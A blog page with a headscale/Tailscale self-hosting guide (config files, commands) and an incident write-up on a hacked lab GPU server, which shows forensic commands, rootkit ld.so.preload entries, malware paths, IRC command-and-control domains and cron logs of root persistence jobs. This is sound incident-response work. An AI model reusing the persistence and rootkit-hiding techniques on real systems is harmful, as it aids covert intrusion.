libreliu's blog

Tailscale Deployment Quick Reference 2025-02-26

2025/02/28: Fixed a typo; thanks to @taoky.

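Introduction to Tailscale

Source: Kimi.ai, K1.5 Long thinking

Tailscale is a mesh VPN service that simplifies secure connections between devices and services on different networks. Some key points:

Basic concepts and how it works
- Mesh network architecture: unlike traditional VPNs that route traffic through a central gateway, Tailscale builds a peer-to-peer mesh network (called a tailnet). Each device can talk directly to the others, which lowers latency and raises throughput; when a direct connection cannot be established, traffic falls back to DERP relays.
- WireGuard protocol: it uses the open-source WireGuard protocol for encrypted point-to-point connections. The protocol is known for its security and performance, and gives end-to-end encryption that fits a zero-trust architecture.
Advantages
- High performance: because data does not pass through a single gateway, there is no central bottleneck or single point of failure for traffic, so connections stay stable as the network grows.
- Security and privacy: built on modern technology and best practices, Tailscale offers strong security features such as access control policies and Tailnet Lock. It also complies with various security standards.
- Ease of use: Tailscale is highly configurable yet very simple to set up. Users can deploy a tailnet within minutes without deep networking knowledge. Its "zero configuration" approach connects devices behind firewalls and NAT without complex setup.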

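Server-Side Deployment

Tailscale can use the official coordination server, but you can also self-host the login server with the open-source headscale implementation.

This guide uses:

- headscale v0.23.0 as the login server
- headscale-ui
- Caddy as the reverse proxy, which puts the UI and headscale's own endpoints behind a single host and obtains TLS certificates automatically to serve HTTPS

The containers are orchestrated with a simple Docker Compose file (format version 3).

See the appendix with the full server-side configuration at the end of this post for details.

The configuration files and commands use the following conventions:

- your.example.com is your domain used to host Tailscale; it should have correctly configured A and AAAA records.
- your_email@example.com is your email address.
- intra.example.com is the MagicDNS suffix. Once connected, clients inside the Tailscale network can resolve each other's in-network IP addresses via hostname.intra.example.com. A subdomain of your own domain is recommended, to avoid clashing with domains that may exist on the public internet.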
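The naming convention above can be sketched in a few lines of Python. This is only an illustration: `magicdns_name` and `base_domain_conflicts` are hypothetical helper names, and the conflict check is a conservative reading of the comment in the headscale config ("This domain _must_ be different from the server_url domain"), not headscale's actual validation code.

```python
from urllib.parse import urlsplit


def magicdns_name(hostname: str, base_domain: str) -> str:
    """Return the MagicDNS name of a node: hostname.base_domain."""
    return f"{hostname}.{base_domain.rstrip('.')}"


def base_domain_conflicts(server_url: str, base_domain: str) -> bool:
    """Conservative check (an assumption): flag the config when the server_url
    host equals base_domain or lives underneath it."""
    host = (urlsplit(server_url).hostname or "").lower()
    base = base_domain.rstrip(".").lower()
    return host == base or host.endswith("." + base)


print(magicdns_name("laptop", "intra.example.com"))
print(base_domain_conflicts("https://your.example.com:443", "intra.example.com"))
```

With the values used in this post, the server host `your.example.com` and the MagicDNS suffix `intra.example.com` are siblings, so the check reports no conflict.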

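After setting things up according to the full server-side configuration, generate an API key so that the Headscale UI web interface can talk to headscale.

For example, the following command generates a key:

# 3650d means the API key expires after 3650 days
docker exec -it headscale headscale apikeys create -e 3650d

Record the key and enter it in Headscale UI; you can then manage client devices, users, and their access from the browser.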
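The same key can, as far as I know, also be used directly against headscale's REST API, which is what Headscale UI does from the browser. The sketch below only builds the request; the `/api/v1/user` path and the `Authorization: Bearer` header are my understanding of headscale v0.23 rather than something stated in this post, so check them against your version. `build_list_users_request` and `list_users` are hypothetical helper names.

```python
import json
import urllib.request


def build_list_users_request(base_url: str, api_key: str) -> urllib.request.Request:
    """Build a GET request for the user list (endpoint path is an assumption)."""
    url = base_url.rstrip("/") + "/api/v1/user"
    return urllib.request.Request(url, headers={"Authorization": f"Bearer {api_key}"})


def list_users(base_url: str, api_key: str):
    """Send the request and decode the JSON body. Needs a reachable server."""
    req = build_list_users_request(base_url, api_key)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Usage (not executed here, it needs your real server and key):
#   list_users("https://your.example.com", "<the key printed by apikeys create>")
```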

Client Connection

Windows

Download the client from the official Tailscale website, install it, open cmd, and run

tailscale login --login-server https://your.example.com/

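Then click the tray notification, which opens Headscale's prompt page.

Next, open the Device page of Headscale UI (for example, https://your.example.com/web/devices.html), add a User, and then add the corresponding Device.

Linux

Follow the instructions on the official Tailscale website, for example the setup guide for Ubuntu 22.04.

The only thing to remember is to pass the --login-server option when running tailscale login.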

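Appendix: Full Server-Side Configuration

- your.example.com is your domain used to host Tailscale; it should have correctly configured A and AAAA records.
- your_email@example.com is your email address.
- intra.example.com is the MagicDNS suffix. Once connected, clients inside the Tailscale network can resolve each other's in-network IP addresses via hostname.intra.example.com. A subdomain of your own domain is recommended, to avoid clashing with domains that may exist on the public internet.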

`./docker-compose.yaml`

This setup ends up exposing two ports publicly: 80 and 443.

version: "3.7"

services:
  headscale:
    image: headscale/headscale:v0.23.0
    restart: unless-stopped
    container_name: headscale
    ports: # 80 is to be forwarded by caddy, and hence not exposed
           # only need to expose others locally
      - "127.0.0.1:9090:9090"  # /metrics
      - "127.0.0.1:50443:50443"  # grpc api
    volumes:
      - /home/libreliu/headscale/config:/etc/headscale
      - headscale_data:/var/lib/headscale
    command: serve
    networks:
      - hs-net

  headscale-ui:
    image: ghcr.io/gurucomputing/headscale-ui:latest
    restart: unless-stopped
    container_name: headscale-ui
    expose:
      - "8443"
      - "8080"
    networks:
      - hs-net

  caddy:
    image: caddy:latest
    container_name: caddy
    restart: unless-stopped
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./Caddyfile:/etc/caddy/Caddyfile
      - caddy_data:/data
      - caddy_config:/config
    networks:
      - hs-net

networks:
  hs-net:
    driver: bridge

volumes:
  caddy_data:
  caddy_config:
  headscale_data:

`./Caddyfile`

{
    email your_email@example.com  # Provide a valid email for ACME notifications.
    admin off  # Disable Caddy's admin API if not needed.
}

# Route for Headscale UI
your.example.com {
    reverse_proxy /web* http://headscale-ui:8080
    reverse_proxy * http://headscale:80
}
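As I understand Caddy's directive ordering, the more specific `/web*` matcher is tried before the catch-all `*`, so the two `reverse_proxy` lines above amount to the routing decision sketched below. `pick_upstream` is a hypothetical name, and the sketch ignores details such as Caddy's case-insensitive path matching.

```python
def pick_upstream(path: str) -> str:
    """Mimic the Caddyfile: /web* goes to the UI, everything else to headscale."""
    if path.startswith("/web"):
        return "http://headscale-ui:8080"
    return "http://headscale:80"


for p in ("/web/devices.html", "/api/v1/user", "/key"):
    print(p, "->", pick_upstream(p))
```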

`./config/config.yaml`

---
# headscale will look for a configuration file named `config.yaml` (or `config.json`) in the following order:
#
# - `/etc/headscale`
# - `~/.headscale`
# - current working directory

# The url clients will connect to.
# Typically this will be a domain like:
#
# https://myheadscale.example.com:443
#
server_url: https://your.example.com:443

# Address to listen to / bind to on the server
#
# For production:
listen_addr: 0.0.0.0:80
#listen_addr: 127.0.0.1:8080

# Address to listen to /metrics, you may want
# to keep this endpoint private to your internal
# network
#
#metrics_listen_addr: 127.0.0.1:9090
metrics_listen_addr: 0.0.0.0:9090

# Address to listen for gRPC.
# gRPC is used for controlling a headscale server
# remotely with the CLI
# Note: Remote access _only_ works if you have
# valid certificates.
#
# For production:
#grpc_listen_addr: 0.0.0.0:50443
grpc_listen_addr: 127.0.0.1:50443

# Allow the gRPC admin interface to run in INSECURE
# mode. This is not recommended as the traffic will
# be unencrypted. Only enable if you know what you
# are doing.
grpc_allow_insecure: false

# The Noise section includes specific configuration for the
# TS2021 Noise protocol
noise:
  # The Noise private key is used to encrypt the
  # traffic between headscale and Tailscale clients when
  # using the new Noise-based protocol.
  private_key_path: /var/lib/headscale/noise_private.key

# List of IP prefixes to allocate tailaddresses from.
# Each prefix consists of either an IPv4 or IPv6 address,
# and the associated prefix length, delimited by a slash.
# It must be within IP ranges supported by the Tailscale
# client - i.e., subnets of 100.64.0.0/10 and fd7a:115c:a1e0::/48.
# See below:
# IPv6: https://github.com/tailscale/tailscale/blob/22ebb25e833264f58d7c3f534a8b166894a89536/net/tsaddr/tsaddr.go#LL81C52-L81C71
# IPv4: https://github.com/tailscale/tailscale/blob/22ebb25e833264f58d7c3f534a8b166894a89536/net/tsaddr/tsaddr.go#L33
# Any other range is NOT supported, and it will cause unexpected issues.
prefixes:
  v6: fd7a:115c:a1e0::/48
  v4: 100.64.0.0/10

  # Strategy used for allocation of IPs to nodes, available options:
  # - sequential (default): assigns the next free IP from the previous given IP.
  # - random: assigns the next free IP from a pseudo-random IP generator (crypto/rand).
  allocation: sequential

# DERP is a relay system that Tailscale uses when a direct
# connection cannot be established.
# https://tailscale.com/blog/how-tailscale-works/#encrypted-tcp-relays-derp
#
# headscale needs a list of DERP servers that can be presented
# to the clients.
derp:
  server:
    # If enabled, runs the embedded DERP server and merges it into the rest of the DERP config
    # The Headscale server_url defined above MUST be using https, DERP requires TLS to be in place
    enabled: false

    # Region ID to use for the embedded DERP server.
    # The local DERP prevails if the region ID collides with other region ID coming from
    # the regular DERP config.
    region_id: 999

    # Region code and name are displayed in the Tailscale UI to identify a DERP region
    region_code: "headscale"
    region_name: "Headscale Embedded DERP"

    # Listens over UDP at the configured address for STUN connections - to help with NAT traversal.
    # When the embedded DERP server is enabled stun_listen_addr MUST be defined.
    #
    # For more details on how this works, check this great article: https://tailscale.com/blog/how-tailscale-works/
    stun_listen_addr: "0.0.0.0:3478"

    # Private key used to encrypt the traffic between headscale DERP
    # and Tailscale clients.
    # The private key file will be autogenerated if it's missing.
    #
    private_key_path: /var/lib/headscale/derp_server_private.key

    # This flag can be used, so the DERP map entry for the embedded DERP server is not written automatically,
    # it enables the creation of your very own DERP map entry using a locally available file with the parameter DERP.paths
    # If you enable the DERP server and set this to false, it is required to add the DERP server to the DERP map using DERP.paths
    automatically_add_embedded_derp_region: true

    # For better connection stability (especially when using an Exit-Node and DNS is not working),
    # it is possible to optionally add the public IPv4 and IPv6 address to the Derp-Map using:
    ipv4: 1.2.3.4
    ipv6: 2001:db8::1

  # List of externally available DERP maps encoded in JSON
  urls:
    - https://controlplane.tailscale.com/derpmap/default

  # Locally available DERP map files encoded in YAML
  #
  # This option is mostly interesting for people hosting
  # their own DERP servers:
  # https://tailscale.com/kb/1118/custom-derp-servers/
  #
  # paths:
  #   - /etc/headscale/derp-example.yaml
  paths: []

  # If enabled, a worker will be set up to periodically
  # refresh the given sources and update the derpmap.
  auto_update_enabled: true

  # How often should we check for DERP updates?
  update_frequency: 24h

# Disables the automatic check for headscale updates on startup
disable_check_updates: false

# Time before an inactive ephemeral node is deleted?
ephemeral_node_inactivity_timeout: 30m

database:
  # Database type. Available options: sqlite, postgres
  # Please note that using Postgres is highly discouraged as it is only supported for legacy reasons.
  # All new development, testing and optimisations are done with SQLite in mind.
  type: sqlite

  # Enable debug mode. This setting requires the log.level to be set to "debug" or "trace".
  debug: false

  # GORM configuration settings.
  gorm:
    # Enable prepared statements.
    prepare_stmt: true

    # Enable parameterized queries.
    parameterized_queries: true

    # Skip logging "record not found" errors.
    skip_err_record_not_found: true

    # Threshold for slow queries in milliseconds.
    slow_threshold: 1000

  # SQLite config
  sqlite:
    path: /var/lib/headscale/db.sqlite

    # Enable WAL mode for SQLite. This is recommended for production environments.
    # https://www.sqlite.org/wal.html
    write_ahead_log: true

  # # Postgres config
  # Please note that using Postgres is highly discouraged as it is only supported for legacy reasons.
  # See database.type for more information.
  # postgres:
  #   # If using a Unix socket to connect to Postgres, set the socket path in the 'host' field and leave 'port' blank.
  #   host: localhost
  #   port: 5432
  #   name: headscale
  #   user: foo
  #   pass: bar
  #   max_open_conns: 10
  #   max_idle_conns: 10
  #   conn_max_idle_time_secs: 3600

  #   # If other 'sslmode' is required instead of 'require(true)' and 'disabled(false)', set the 'sslmode' you need
  #   # in the 'ssl' field. Refers to https://www.postgresql.org/docs/current/libpq-ssl.html Table 34.1.
  #   ssl: false

### TLS configuration
#
## Let's encrypt / ACME
#
# headscale supports automatically requesting and setting up
# TLS for a domain with Let's Encrypt.
#
# URL to ACME directory
acme_url: https://acme-v02.api.letsencrypt.org/directory

# Email to register with ACME provider
acme_email: ""

# Domain name to request a TLS certificate for:
tls_letsencrypt_hostname: ""

# Path to store certificates and metadata needed by
# letsencrypt
# For production:
tls_letsencrypt_cache_dir: /var/lib/headscale/cache

# Type of ACME challenge to use, currently supported types:
# HTTP-01 or TLS-ALPN-01
# See [docs/tls.md](docs/tls.md) for more information
tls_letsencrypt_challenge_type: HTTP-01
# When HTTP-01 challenge is chosen, letsencrypt must set up a
# verification endpoint, and it will be listening on:
# :http = port 80
tls_letsencrypt_listen: ":http"

## Use already defined certificates:
tls_cert_path: ""
tls_key_path: ""

log:
  # Output formatting for logs: text or json
  format: text
  level: info

## Policy
# headscale supports Tailscale's ACL policies.
# Please have a look to their KB to better
# understand the concepts: https://tailscale.com/kb/1018/acls/
policy:
  # The mode can be "file" or "database" that defines
  # where the ACL policies are stored and read from.
  mode: file
  # If the mode is set to "file", the path to a
  # HuJSON file containing ACL policies.
  path: ""

## DNS
#
# headscale supports Tailscale's DNS configuration and MagicDNS.
# Please have a look to their KB to better understand the concepts:
#
# - https://tailscale.com/kb/1054/dns/
# - https://tailscale.com/kb/1081/magicdns/
# - https://tailscale.com/blog/2021-09-private-dns-with-magicdns/
#
# Please note that for the DNS configuration to have any effect,
# clients must have the `--accept-dns=true` option enabled. This is the
# default for the Tailscale client.
#
# Setting _any_ of the configuration and `--accept-dns=true` on the
# clients will integrate with the DNS manager on the client or
# overwrite /etc/resolv.conf.
# https://tailscale.com/kb/1235/resolv-conf
#
# If you want to stop Headscale from managing the DNS configuration
# all the fields under `dns` should be set to empty values.
dns:
  # Whether to use [MagicDNS](https://tailscale.com/kb/1081/magicdns/).
  # Only works if there is at least a nameserver defined.
  magic_dns: true

  # Defines the base domain to create the hostnames for MagicDNS.
  # This domain _must_ be different from the server_url domain.
  # `base_domain` must be a FQDN, without the trailing dot.
  # The FQDN of the hosts will be
  # `hostname.base_domain` (e.g., _myhost.example.com_).
  base_domain: intra.example.com

  # List of DNS servers to expose to clients.
  nameservers:
    global:
      - 1.1.1.1
      - 1.0.0.1
      - 2606:4700:4700::1111
      - 2606:4700:4700::1001

      # NextDNS (see https://tailscale.com/kb/1218/nextdns/).
      # "abc123" is example NextDNS ID, replace with yours.
      # - https://dns.nextdns.io/abc123

    # Split DNS (see https://tailscale.com/kb/1054/dns/),
    # a map of domains and which DNS server to use for each.
    split:
      {}
      # foo.bar.com:
      #   - 1.1.1.1
      # darp.headscale.net:
      #   - 1.1.1.1
      #   - 8.8.8.8

  # Set custom DNS search domains. With MagicDNS enabled,
  # your tailnet base_domain is always the first search domain.
  search_domains: []

  # Extra DNS records
  # so far only A-records are supported (on the tailscale side)
  # See https://github.com/juanfont/headscale/blob/main/docs/dns-records.md#Limitations
  extra_records: []
  #   - name: "grafana.myvpn.example.com"
  #     type: "A"
  #     value: "100.64.0.3"
  #
  #   # you can also put it in one line
  #   - { name: "prometheus.myvpn.example.com", type: "A", value: "100.64.0.3" }

  # DEPRECATED
  # Use the username as part of the DNS name for nodes, with this option enabled:
  # node1.username.example.com
  # while when this is disabled:
  # node1.example.com
  # This is a legacy option as Headscale has had this wrongly implemented
  # while in upstream Tailscale, the username is not included.
  use_username_in_magic_dns: false

# Unix socket used for the CLI to connect without authentication
# Note: for production you will want to set this to something like:
unix_socket: /var/run/headscale/headscale.sock
unix_socket_permission: "0770"
#
# headscale supports experimental OpenID connect support,
# it is still being tested and might have some bugs, please
# help us test it.
# OpenID Connect
# oidc:
#   only_start_if_oidc_is_available: true
#   issuer: "https://your-oidc.issuer.com/path"
#   client_id: "your-oidc-client-id"
#   client_secret: "your-oidc-client-secret"
#   # Alternatively, set `client_secret_path` to read the secret from the file.
#   # It resolves environment variables, making integration to systemd's
#   # `LoadCredential` straightforward:
#   client_secret_path: "${CREDENTIALS_DIRECTORY}/oidc_client_secret"
#   # client_secret and client_secret_path are mutually exclusive.
#
#   # The amount of time from a node is authenticated with OpenID until it
#   # expires and needs to reauthenticate.
#   # Setting the value to "0" will mean no expiry.
#   expiry: 180d
#
#   # Use the expiry from the token received from OpenID when the user logged
#   # in, this will typically lead to frequent need to reauthenticate and should
#   # only be enabled if you know what you are doing.
#   # Note: enabling this will cause `oidc.expiry` to be ignored.
#   use_expiry_from_token: false
#
#   # Customize the scopes used in the OIDC flow, defaults to "openid", "profile" and "email" and add custom query
#   # parameters to the Authorize Endpoint request. Scopes default to "openid", "profile" and "email".
#
#   scope: ["openid", "profile", "email", "custom"]
#   extra_params:
#     domain_hint: example.com
#
#   # List allowed principal domains and/or users. If an authenticated user's domain is not in this list, the
#   # authentication request will be rejected.
#
#   allowed_domains:
#     - example.com
#   # Note: Groups from keycloak have a leading '/'
#   allowed_groups:
#     - /headscale
#   allowed_users:
#     - alice@example.com
#
#   # If `strip_email_domain` is set to `true`, the domain part of the username email address will be removed.
#   # This will transform `first-name.last-name@example.com` to the user `first-name.last-name`
#   # If `strip_email_domain` is set to `false` the domain part will NOT be removed resulting to the following
#   user: `first-name.last-name.example.com`
#
#   strip_email_domain: true

# Logtail configuration
# Logtail is Tailscale's logging and auditing infrastructure, it allows the control panel
# to instruct tailscale nodes to log their activity to a remote server.
logtail:
  # Enable logtail for this headscale's clients.
  # As there is currently no support for overriding the log server in headscale, this is
  # disabled by default. Enabling this will make your clients send logs to Tailscale Inc.
  enabled: false

# Enabling this option makes devices prefer a random port for WireGuard traffic over the
# default static port 41641. This option is intended as a workaround for some buggy
# firewall devices. See https://tailscale.com/kb/1181/firewalls/ for more information.
randomize_client_port: true
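The `prefixes` comments in the config above say that only subnets of 100.64.0.0/10 and fd7a:115c:a1e0::/48 are supported. A minimal sketch of that rule with Python's standard `ipaddress` module follows; `prefix_supported` is a hypothetical helper for checking a value before putting it into config.yaml, not part of headscale.

```python
import ipaddress

# The two ranges named in the config comments above.
SUPPORTED = [
    ipaddress.ip_network("100.64.0.0/10"),
    ipaddress.ip_network("fd7a:115c:a1e0::/48"),
]


def prefix_supported(prefix: str) -> bool:
    """True if prefix is one of the supported ranges or a subnet of one."""
    net = ipaddress.ip_network(prefix)
    # Compare only within the same IP version; subnet_of raises otherwise.
    return any(net.version == s.version and net.subnet_of(s) for s in SUPPORTED)


for candidate in ("100.64.0.0/10", "100.64.0.0/24", "192.168.0.0/24", "fd00::/8"):
    print(candidate, prefix_supported(candidate))
```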

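How Our GPU Training Server Got Hacked (a.k.a. "Now the server has become conveyor-belt sushi, the tastiest episode") 2024-02-28

Our GPU training server got hacked. Here is what happened:

Running log

2024/2/27: A senior labmate noticed that the campus network access account (网络通) logged in on the lab server had received a message from the Network Information Center:

Hello!

The IP address xxx.xxx.xx.xxx that you are using shows abnormal communication behavior.
Please deal with the system as soon as possible; otherwise the Network Information Center will suspend this machine's external network access.

USTC Network Information Center (contact details omitted)

Abnormal behavior:
xxx.xxx.xx.xx is issuing a large number of queries for the domain ircx.us.to; this IP is suspected to have been compromised and to be under remote control.

There were two messages, left at 2024/2/21 20:44 and 2024/2/27 09:31, both reporting high-frequency DNS queries for IRC server domains.

I took a quick look with tcpdump -i lo port 53 and saw many DNS queries every second. Because the machine uses systemd-resolved, the DNS server is systemd's stub resolver at 127.0.0.53, so the queries are visible on the local loopback interface.

Watching for a while showed queries mainly to three domains, ircx.us.to, irc.dal.net, and irc.undernet.org, at more than 100 queries per second.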
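Counting which names are being queried can be automated by piping the tcpdump text output through a small script. The sketch below assumes tcpdump's usual one-line DNS format (`... 4660+ A? name. (28)`); the sample lines are made up for illustration and were not captured during the incident.

```python
import re
from collections import Counter

# Matches the question part of a tcpdump DNS line, e.g. "A? ircx.us.to."
QUERY_RE = re.compile(r"\b(A|AAAA)\? (\S+)")


def count_queries(lines):
    """Count queried names in tcpdump text output (trailing dot removed)."""
    counts = Counter()
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            counts[m.group(2).rstrip(".")] += 1
    return counts


# Illustrative lines only (assumed format, invented values).
SAMPLE = [
    "22:41:07.000001 IP 127.0.0.1.43814 > 127.0.0.53.53: 4660+ A? ircx.us.to. (28)",
    "22:41:07.000950 IP 127.0.0.1.52710 > 127.0.0.53.53: 4661+ AAAA? ircx.us.to. (28)",
    "22:41:07.001800 IP 127.0.0.1.55728 > 127.0.0.53.53: 4662+ A? irc.dal.net. (29)",
]

for name, n in count_queries(SAMPLE).most_common():
    print(n, name)
```

In practice the lines would come from something like `tcpdump -l -n -i lo port 53` on standard input instead of `SAMPLE`.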

Clearly, the server had been compromised.

2024/2/28: With @taoky's help we carried out a fairly thorough investigation, which took a whole evening.

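Background

The server sits inside the USTC campus network and is connected to the Management Science Building (管科楼) over a 100 Mbps Ethernet link, with university IPv4 and IPv6 addresses. It has no dedicated network access account; when internet access is needed, students log in with their own accounts.

The server runs Ubuntu 20.04 LTS and holds 10 (9?) RTX 3090 GPUs. Users normally log in over ssh with a public key, or with password + TOTP code (using libpam-google-authenticator).

The server has 25 users, of whom 5 have sudo privileges and 3 are in the docker group. The Docker daemon runs as root.

netstat -nlp shows programs such as pgyvpn and ZeroTier running on it.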

Analysis

The rough analysis timeline is as follows:

Identifying which process is sending the DNS requests

$ sudo netstat -np | grep 127.0.0.53:53 | grep udp
udp        0      0 127.0.0.1:41511         127.0.0.53:53           ESTABLISHED -                   
udp      768      0 127.0.0.1:43814         127.0.0.53:53           ESTABLISHED 5973/./nobody       
udp        0      0 127.0.0.1:44384         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:46012         127.0.0.53:53           ESTABLISHED 1989649/[           
udp      768      0 127.0.0.1:52710         127.0.0.53:53           ESTABLISHED 5975/./nobody       
udp        0      0 127.0.0.1:55295         127.0.0.53:53           ESTABLISHED 1989647/[           
udp      768      0 127.0.0.1:55728         127.0.0.53:53           ESTABLISHED 5976/./nobody       
udp        0      0 127.0.0.1:55801         127.0.0.53:53           ESTABLISHED 1986059/[kwor       
udp        0      0 127.0.0.1:56095         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:57082         127.0.0.53:53           ESTABLISHED 2178005/[           
udp        0      0 127.0.0.1:58772         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:59061         127.0.0.53:53           ESTABLISHED 1995387/[           
udp        0      0 127.0.0.1:59165         127.0.0.53:53           ESTABLISHED 1986012/[           
udp        0      0 127.0.0.1:60684         127.0.0.53:53           ESTABLISHED -

The suspects are several processes, including PIDs 5976 and 1989649.
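Picking the PIDs out of the netstat output by eye gets tedious, so here is a small sketch that extracts them. It assumes the column layout shown above (the seventh column is `PID/program`, or `-` when netstat cannot attribute the socket); `pids_talking_to` is a hypothetical helper name, and the sample lines are copied from the output above.

```python
def pids_talking_to(netstat_lines, remote="127.0.0.53:53"):
    """Return the sorted PIDs owning sockets connected to `remote`."""
    pids = set()
    for line in netstat_lines:
        fields = line.split()
        if len(fields) < 7 or fields[4] != remote:
            continue
        pid, _, _ = fields[6].partition("/")  # "5973/./nobody" -> "5973"
        if pid.isdigit():  # skips "-" entries with no visible owner
            pids.add(int(pid))
    return sorted(pids)


SAMPLE = [
    "udp        0      0 127.0.0.1:41511         127.0.0.53:53           ESTABLISHED -",
    "udp      768      0 127.0.0.1:43814         127.0.0.53:53           ESTABLISHED 5973/./nobody",
    "udp        0      0 127.0.0.1:46012         127.0.0.53:53           ESTABLISHED 1989649/[",
    "udp      768      0 127.0.0.1:52710         127.0.0.53:53           ESTABLISHED 5975/./nobody",
    "udp        0      0 127.0.0.1:55801         127.0.0.53:53           ESTABLISHED 1986059/[kwor",
]

print(pids_talking_to(SAMPLE))
```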

But then, ta-da:

$ sudo ps aux | grep 5975
lzt 40314 0.0 0.0 19764 2856 pts/11 S+ 22:41 0:00 grep --color=auto 5975

This is thanks to a rootkit: some entries had been added to /etc/ld.so.preload. No big deal, though; a statically linked busybox can still see everything:

$ sudo ./busybox cat /etc/ld.so.preload
/usr/local/lib/dbus-collector/libdbus_x86_64.so
/usr/local/lib/network.so
$ sudo ./busybox ps aux | grep 5975
 5975 zx        5:43 ./nobody nmop
44054 lzt       0:00 grep --color=auto 5975
$ sudo ./busybox readlink -f /proc/5975/exe
/home/zx/.cpan/nobody

A closer look shows that the following users have a .cpan directory:

/home/spf/.cpan
/home/xy/.cpan
/home/zx/.cpan

Now let's look at a few of the other processes:

$ sudo ./busybox readlink -f /proc/1986059/exe
/usr/bin/crond
$ sudo ./busybox readlink -f /proc/1989647/exe
/usr/bin/a
# same for the others

What the cron logs reveal

The cron entries in journalctl reveal some additional information:


2月 28 22:53:01 GPU crontab[62015]: (yyy) LIST (yyy)
2月 28 22:54:01 GPU crontab[63492]: (yyy) LIST (yyy)
2月 28 22:55:01 GPU CRON[65423]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:55:01 GPU CRON[65424]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:55:01 GPU CRON[65427]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:55:01 GPU CRON[65426]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:55:01 GPU CRON[65425]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:55:01 GPU CRON[65428]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:55:01 GPU CRON[65429]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:55:01 GPU CRON[65430]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:55:01 GPU CRON[65423]: pam_unix(cron:session): session closed for user root
2月 28 22:55:01 GPU CRON[65424]: pam_unix(cron:session): session closed for user root
2月 28 22:55:01 GPU crontab[65438]: (yyy) LIST (yyy)
2月 28 22:55:01 GPU CRON[65425]: pam_unix(cron:session): session closed for user xy
2月 28 22:55:01 GPU CRON[65426]: (CRON) info (No MTA installed, discarding output)
2月 28 22:55:01 GPU CRON[65426]: pam_unix(cron:session): session closed for user yyy
2月 28 22:56:01 GPU CRON[67335]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:56:01 GPU CRON[67338]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:56:01 GPU CRON[67334]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:56:01 GPU CRON[67339]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:56:01 GPU CRON[67336]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:56:01 GPU CRON[67337]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:56:01 GPU CRON[67340]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:56:01 GPU CRON[67342]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:56:01 GPU CRON[67334]: pam_unix(cron:session): session closed for user root
2月 28 22:56:01 GPU CRON[67335]: pam_unix(cron:session): session closed for user root
2月 28 22:56:01 GPU CRON[67336]: pam_unix(cron:session): session closed for user xy
2月 28 22:56:01 GPU crontab[67351]: (yyy) LIST (yyy)
2月 28 22:56:01 GPU CRON[67337]: (CRON) info (No MTA installed, discarding output)
2月 28 22:56:01 GPU CRON[67337]: pam_unix(cron:session): session closed for user yyy
2月 28 22:57:01 GPU CRON[69563]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:57:01 GPU CRON[69561]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:57:01 GPU CRON[69564]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:57:01 GPU CRON[69562]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:57:01 GPU CRON[69560]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:57:01 GPU CRON[69565]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:57:01 GPU CRON[69566]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:57:01 GPU CRON[69567]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:57:01 GPU CRON[69562]: pam_unix(cron:session): session closed for user xy
2月 28 22:57:01 GPU CRON[69560]: pam_unix(cron:session): session closed for user root
2月 28 22:57:01 GPU CRON[69561]: pam_unix(cron:session): session closed for user root
2月 28 22:57:01 GPU CRON[69563]: (CRON) info (No MTA installed, discarding output)
2月 28 22:57:01 GPU CRON[69563]: pam_unix(cron:session): session closed for user yyy
2月 28 22:58:01 GPU CRON[70918]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:58:01 GPU CRON[70917]: pam_unix(cron:session): session opened for user root by (uid=0)
2月 28 22:58:01 GPU CRON[70919]: pam_unix(cron:session): session opened for user xy by (uid=0)
2月 28 22:58:01 GPU CRON[70920]: pam_unix(cron:session): session opened for user yyy by (uid=0)
2月 28 22:58:01 GPU CRON[70921]: (root) CMD (/.dbus/auto >/dev/null 2>&1)
2月 28 22:58:01 GPU CRON[70923]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:58:01 GPU CRON[70922]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)
2月 28 22:58:01 GPU CRON[70924]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)
2月 28 22:58:01 GPU CRON[70919]: pam_unix(cron:session): session closed for user xy
2月 28 22:58:01 GPU CRON[70918]: pam_unix(cron:session): session closed for user root

This additionally reveals three scripts:

/dev/shm/.m-1013/dbus-collector.seed
/root/.cpan/.cache/update
/.dbus/auto
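Pulling the distinct (user, command) pairs out of such a log is easy to script. The sketch below assumes the journal line format shown above; `cron_commands` is a hypothetical helper name and the sample lines are copied from the log.

```python
import re

# "CRON[pid]: (user) CMD (command)" as it appears in the journal lines above.
CMD_RE = re.compile(r"CRON\[\d+\]: \((\S+)\) CMD \((.*)\)\s*$")


def cron_commands(log_lines):
    """Return the sorted set of (user, command) pairs that cron executed."""
    seen = set()
    for line in log_lines:
        m = CMD_RE.search(line)
        if m:
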